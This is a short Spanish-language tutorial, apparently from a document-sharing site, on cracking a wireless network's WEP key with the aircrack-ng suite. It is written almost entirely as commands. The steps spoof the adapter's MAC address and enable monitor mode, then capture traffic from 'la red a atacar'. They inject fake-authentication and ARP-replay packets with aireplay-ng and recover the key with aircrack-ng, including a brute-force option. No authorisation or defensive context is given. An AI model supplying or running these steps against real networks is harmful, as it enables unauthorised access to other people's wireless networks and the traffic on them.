Está en la página 1de 1

Descifrar encriptado WEP con aircark-ng

1. Cambiar la dirección MAC del adaptador de red inalámbrico:


# ifconfig wlan0 down
# macchanger -m 00:11:22:33:44:55
# ifconfig wlan0 up

2. Habilitar el adaptador de red inalámbrico para monitoreo de paquetes:


# airmon-ng start wlan0

3. Identificar las redes inalámbricas disponibles así como las MAC y canales de las
mismas:
# airodump-ng wlan0

4. Una vez identificadas las redes y canales disponibles, utilizar el filtro


correspondiente para enfocarse únicamente en el canal deseado y guardar el
registro de paquetes en un archivo:
# airodump-ng -c (número de canal) -w (nombre del archivo .cap) wlan0

5. Conectar con la red inalámbrica y con el ruteador correspondiente utilizando una


nueva solapa en la terminal:
# aireplay-ng -1 0 -e (ESSID o nombre la red a atacar [en caso de que el nombre
contenga espacios escribirlo entre comillas “”]) -a (MAC de la red a atacar o BSSID) -h
(MAC propia establecida anteriormente en oo:11:22:33:44:55) wlan0

6. Acelerar el proceso de captura de paquetes:


# aireplay-ng -3 -b (MAC de la red a atacar o BSSID) -h (MAC propia establecida
anteriormente en oo:11:22:33:44:55) wlan0

7. Una vez capturados 150.000 paquetes en ARP se puede proceder al descifrado de


la clave WEP utilizando una nueva solapa en la terminal:
# aircrack-ng (nombre del archivo .cap)*.cap Este proceso es más lento
# aircrack-ng (nombre del archivo .cap)*.cap -z Es más rápido pero requiere
más paquetes capturados.
# aircrack-ng (nombre del archivo .cap)*.cap -y Para utilizar fuerza bruta
# aircrack-ng (combre del archivo .cap)*.cap -n 64 Para especificar la longitud de
la clave WEP en bits: 64 para 40-bit WEP; 128 para 104-bit WEP, etc. El valor por
defecto es 128 y en 2wire 64 bits.

También podría gustarte